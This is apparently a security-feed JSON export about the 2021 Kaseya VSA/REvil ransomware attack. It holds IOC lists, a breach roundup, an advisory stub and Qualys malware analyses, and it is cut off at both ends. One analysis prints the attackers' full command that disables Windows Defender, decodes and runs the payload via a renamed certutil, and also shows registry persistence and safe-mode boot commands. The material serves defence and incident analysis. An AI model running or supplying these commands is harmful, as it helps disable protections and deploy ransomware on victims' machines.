C:\\WINDOWS\\MPSVC.DLL\n\nAdditional IOCs from configuration file ([source](<https://gist.github.com/fwosar/a63e1249bfccb8395b961d3d780c0354>))\n\nProcess list to kill\n \n \n encsvc \n powerpnt \n ocssd \n steam \n isqlplussvc \n outlook \n sql \n ocomm \n agntsvc \n mspub \n onenote \n winword \n thebat \n excel \n mydesktopqos \n ocautoupds \n thunderbird \n synctime \n infopath \n mydesktopservice \n firefox \n oracle \n sqbcoreservice \n dbeng50 \n tbirdconfig \n msaccess \n visio \n dbsnmp \n wordpad \n xfssvccon\n\nServices to stop and delete\n \n \n veeam\n memtas\n sql\n backup\n vss\n sophos\n svc$\n mepocs\n\nThe post [UPDATED: Kaseya hijacked, thousands attacked by REvil, fix delayed again](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T21:46:15", "type": "malwarebytes", "title": "UPDATED: Kaseya hijacked, thousands attacked by REvil, fix delayed again", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-02T21:46:15", "id": "MALWAREBYTES:EB242DD11B13A86E44E4325F83689782", "href": "https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-21T11:57:15", "description": "Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations \u2014 and it\u2019s no secret that hackers are always looking for security vulnerabilities in them to exploit.\n\nAccording to [research by BetterCloud](<http://pages.bettercloud.com/rs/719-KZY-706/images/2020_StateofSaaSOpsReport.pdf?mkt_tok=NzE5LUtaWS03MDYAAAF8LQdmoC7u54xbqxNwp0au4Zk7SiYaaqq2vupXFxCvaP5vY8gSQtlGFsUsRI8oj5Fl2m5PwIZUUAlzVZL_-hUEQ2RdNqgEzDAmZA5bZtowS_v-zMs>), the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.\n\nCoupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it\u2019s not surprising that businesses and governments are struggling to keep up with the [volume of security vulnerabilities and patches](<https://media.bitpipe.com/io_15x/io_152272/item_2184126/ponemon-state-of-vulnerability-response-.pdf>).\n\nAnd lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit [multiple security vulnerabilities in 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>).\n\nIn this post, we\u2019ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.\n\n## 1\\. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments\n\nFirst publicly announced in early December 2021, [Log4shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance ](<https://blog.malwarebytes.com/glossary/recon/>)and credential harvesting.\n\n## 2. North Korean government backed-groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google's Threat Analysis Group (TAG) [discovered that two North Korean government backed-groups ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>)exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and[ AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by[ exploiting a vulnerability** **](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>)[**(CVE-20**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[2](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[**1-40539)**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)[ in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploited this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payl](<https://blog.malwarebytes.com/glossary/payload/>)[oad ](<https://blog.malwarebytes.com/glossary/payload/.>)to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person's ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil [exploi](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>)[ted a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)[2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya's web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and[ patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:18", "description": "A remote code execution vulnerability exists in Kaseya VSA. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-27T00:00:00", "type": "checkpoint_advisories", "title": "Kaseya VSA Remote Code Execution (CVE-2021-30116)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-12-27T00:00:00", "id": "CPAI-2021-0946", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-07-28T14:34:25", "description": "On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. The REvil ransomware attack leveraged multiple zero-day vulnerabilities in Kaseya\u2019s VSA (Virtual System/Server Administrator) product that helps Kaseya customers to monitor and manage their infrastructure. To deploy ransomware payloads on the systems of Kaseya customers and their clients, the REvil operators exploited zero-day vulnerability CVE-2021-30116.\n\nREvil ransomware (also known as Sodinokibi) is ransomware-as-a-service (RaaS), meaning an attacker distributes the licensed copy of this ransomware over the internet and the ransom is split between the developers. After an attack, REvil would threaten to publish the information on their page 'Happy Blog' unless the ransom is received.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/happy-blog.jpg)**Image Source**: [DarkTracer](<https://twitter.com/darktracer_int/status/1411866196199178244>)\n\nThe REvil ransomware group has demanded a $70 million payment to provide a universal decryptor tool to unlock the files corrupted by REvil ransomware.\n\nREvil\u2019s attacks on Kaseya VSA servers have led to outages in unexpected places, such as supermarket chains in Sweden, kindergartens in New Zealand, and some public administration offices in Romania. In a message posted on their dark web [blog](<https://twitter.com/darktracer_int/status/1411866196199178244>), the REvil gang officially took credit for the attack for the first time and claimed they locked more than one million systems during the Kaseya incident.\n\nOn July 4, [CISA and FBI](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) published an advisory to respond to REvil attack and have urged users to download the [Kaseya VSA Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that determines if any indicators of compromise are present on system.\n\nKaseya is sharing regular updates on their [website](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-3rd-2021>) and believes that this has been localized to a very small number of on-premises customers only.\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with Kaseya installed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/GAI-1-1070x498.png)software:(publisher:Kaseya and product:"Kaseya Agent")\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cREvil ransomware\u201d. This helps in automatically grouping existing hosts with ransomware as well as any new systems that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Discover Kaseya VSA Vulnerability\n\nNow that hosts with REvil Ransomware are identified, you want to detect which of these assets have flagged this vulnerability. Qualys VMDR automatically detects new vulnerabilities like Kaseya VSA based on the always updated Knowledgebase.\n\nQualys has released an IG (information gathered) QID to detect the presence of Kaseya VSA.\n\nYou can see all your impacted hosts for this vulnerability tagged with the 'REvil Ransomware\u201d asset tag in the vulnerabilities view by using this QQL query:\n\n`vulnerabilities.vulnerability.qid: 48187`\n\nThis will return a list of all hosts that have Kaseya VSA installed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/VulnSearch-1-1070x567.png)\n\nIG QID: 48187 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected remotely.\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Picture-1.png)\n\nWith Qualys Unified Dashboard, you can track REvil ransomware, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of Kaseya VSA vulnerability trends, EDR events and ransomware-related compliance controls in your environment using the [REvil ransomware Dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/image005.png)\n\n### Workarounds\n\nDisable RDP if not used. If required change the RDP port to a non-standard port.\n\nAfter identifying vulnerable assets, monitor them for malicious activity. \n\nAs a best practice, follow these steps:\n\n * Keep operating systems, software, and applications current and up to date.\n * Make sure anti-virus and anti-malware solutions are set to automatically update and run regular scans.\n * Create backup copies of all important data as a good step towards securing the data. Backup copies can be kept on physically disconnected systems to maximize security.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical Kaseya VSA vulnerability CVE-2021-30116.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T17:07:54", "type": "qualysblog", "title": "Kaseya REvil Ransomware Attack (CVE-2021-30116) \u2013 Automatically Discover and Prioritize Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T17:07:54", "id": "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:25", "description": "Over the past year, there has been a rise in extortion malware, e.g. [Nefilim](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>) and [Darkside](<https://blog.qualys.com/vulnerabilities-research/2021/06/09/darkside-ransomware>), which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.\n\nIn a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers\u2019 goal was monetary gain rather than cyber espionage.\n\nThe attacks have been attributed to REvil, ransomware was first identified in April 2019 according to [MITRE](<https://attack.mitre.org/software/S0496/>). REvil is a ransomware family that has been linked to [GOLD SOUTHFIELD](<https://www.secureworks.com/research/threat-profiles/gold-southfield>), a financially motivated group that operates a \u201cRansomware as a service\u201d model. This group distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers.\n\nREvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/revil1.png)Fig. 1: Dark website\n\n### **Technical Details**\n\n#### **Initial access******\n\nThe ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability ([CVE-2021-30116](<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>)) in the Kaseya VSA server platform. \n\nSecurity researchers at [Huntress Labs](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) and [TrueSec](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) have identified three zero-day vulnerabilities potentially used into attacks against their clients, including:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability****\n\n[Multiple sources ](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>)have stated that the following file was used to install and execute the ransomware attack on Windows systems:\n\nThe "Kaseya VSA Agent Hot-fix\u201d procedure ran the following command: \n\n`\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe`\n\nThe above command disables Windows Defender, copies and renames certutil.exe to %SystemDrive%\\Windows, and decrypts the agent.crt file. Certutil.exe is mostly used as a \u201cliving-off-the-land\u201d binary and is capable of downloading and decoding web-encoded content. In order to avoid detection, the attacker copied this utility as %SystemDrive`%\\cert.exe` and executed the malicious payload agent.exe.\n\nagent.exe| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n---|--- \n \nThe agent.exe contains two resources (MODLS.RC, SOFIS.RC) in it as shown in the following image.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-2-Resourse.png)Fig. 2: Resource from agent.exe\n\nAgent.exe dropped these resources in the windows folder. Resources named MODLIS and SOFTIS were dropped as mpsvc.dll and MsMpEng.exe respectively.\n\nMODLIS| e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n---|--- \nmpsvc.dll| 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \nSOFTIS| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \nMsMpEng.exe| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \n \nMsMpeng.exe is an older version of Microsoft\u2019s Antimalware Service executable which is vulnerable to a DLL side-loading attack. In a DLL side-loading attack, malicious code is in a DLL file with a similar name which is required for the target executable.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-3-Version_info.png)Fig. 3: Version information of MsMpeng.exe\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-4-Digital_signature_info.png)Fig. 4: Digital certificate information of MsMpeng.exe\n\nAgent.exe then drops MsMpeng.exe and mpsvc.dll. After dropping these two files, agent.exe executes MsMpeng.exe as shown in the following image.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-5-Write_resource_Create_process.png)Fig. 5: Drop files and create a process of MsMpEng.exe\n\n### **Ransomware Execution******\n\nWhen MpMseng.exe runs and calls the ServiceCrtMain, the Malicious Mpsvc.dll loads and gets loaded and executed.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-6-MsMpEng_start.png)Fig. 6: ServiceCrtMain call function of MsMpEng.exe\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-7-mpsvc_Start_point.png)Fig. 7: ServiceCrtMain call function of MsMpEng.exe\n\nRansomware uses OpenSSL to conduct its Cryptographic Operations.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-8-Cryptographic_operation.png)Fig. 8: Use OpenSSL to conduct Cryptographic Operations\n\nMalware uses \u2018CreateFileMappingW\u2019 and \u2018MapViewOfFile\u2019 functions to bring code in memory. \u2018CreateFileMapping\u2019 function is useful to load a file into memory. The function creates a handle to the mapping while the \u2018MapViewOfFile\u2019 function maps the file into memory space and returns a pointer to the start of the mapped file.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CreateFileMappingViewW.png)Fig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory \n\nMalware allocates memory and decrypts the main payload (PE file) in memory. Malware removes some unused magic constants from the header to evade it. Magic constants such as 0x4D5A (MZ) 0x5045 (PE). This method requires loading and executing a payload just like a shellcode.\n\nNowadays most of malware authors use custom packers, these packers, unpack and load payload module without PE Header magic constants at load time. These Packers keep other relevant information from PE Header, such as section header, API import, and relocations data, etc.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Main_Payload.png)Fig. 10: Main Payload \n\nMalware Decrypts and bring config file. Config file is in JSON format.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Config_File-1070x257.png)Fig. 11: Config File\n\nConfig file contain following fields.\n\nField| Definition \n---|--- \npk | Public key in base 64 \npid | Version ID \nsub | tag Number \ndbg | Is it dbg mode \net | encryption type \nwipe | wipe folder flag \nfld | Folder list that wants to to skip during the encryption process \nfls | File list that wants to to skip during the encryption process \next | file extension that wants to to skip during the encryption process \nwfld | The folder it wants to wipe \nprc | Process name list it wants to terminate \ndmn | Potential list of C&C Domains \nnet | Communication flag \nsvc | Service name list that wants to stop \nnbody | Ransomware note in base64 format \nnname | Ransomware note file extension \nexp | Flag to local privledge escalation \nimg | Ransomware note that will be in bitmap form \narn | Persistence flag \nrdmcnt | Readme count \n \nRansomware makes the following changes in the local Firewall rule.\n\n\u201cnetsh advfirewall firewall set rule group==\u201dNetwork Discovery\u201d new enable=Yes\u201d\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-9-netsh.png)Fig. 12: Command to change local firewall\n\nIt creates the following Registry entry: \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter`\n\nThe following values are added in HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter:\n\n`96Ia6 = {Hex Value}` \n`Ed7 = {Hex Value}` \n`JmfOBvhb = {Hex Value}` \n`QIeQ = {Hex Value}` \n`Ucr1RB = {Hex Value}` \n`wJWsTYE = .{appended extension to files after encryption}`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Registry-1070x122.png)\n\nThe malware adds registry values under the following Registry Key. \n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon`\n\n * AutoAdminLogon = 1 \n * DefaultUserName = {Current User Name} \n * DefaultPassword = \u201cDTrump4ever\u201d \n\nWith the above Registry values, windows will automatically log in with new account information. \n\nThe malware executes the following commands to force the computer to boot into safe mode with Networking: \n`bcdedit /set {current} safeboot network`\n\nAlso, malware add the same command in Registry under \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\n\n`*MarineLePen = bcdedit /set {current} safeboot network `\n\nFinally, a ransom note is dropped using a random filename for example \u201cs5q78-readme.txt\u201d.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/Fig.-10-Encryption-Message.png)Fig. 13: Ransom note\n\n### Dashboard\n\nTo track your exposure, download and run the [Kaseya (REvil RansomWare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/kaseya-REvil-1070x796.png)\n\n### Artifact\n\n * The group launches 0day authorization [bypass/SQL injection](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) attack via the userFilterTableRpt.asp file.\n * In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).\n * The group delivers a PowerShell payload that disables Windows Defender.\n * The group copied and renamed certutil.exe to cert.exe before running the commands.\n * The group uses certutil.exe to decode and execute the previously uploaded agent.crt to agent.exe files.\n * The group uploaded a .js file masqueraded as a .jpg file - screenshot.jpg.\n * The group has used services like Shodan to collect a list of targets before attacking.\n * The group encrypts files on victim systems and demands a ransom to decrypt the files.\n\n### REvil TTP Map\n\nReconnaissance| Initial Access| Execution| Defense Evasion| Command and Control| Impact \n---|---|---|---|---|--- \nSearch Open Technical Databases: Scan Databases (T1596.005)| Exploit Public-Facing Application (T1190)| Command and Scripting Interpreter: PowerShell (T1059.001)| Indicator Removal on Host: File Deletion (T1070.004)| Ingress Tool Transfer (T1105)| Data Manipulation: Stored Data Manipulation (T1565.001) \n| | | Deobfuscate/Decode Files or Information (T1140)| | Data 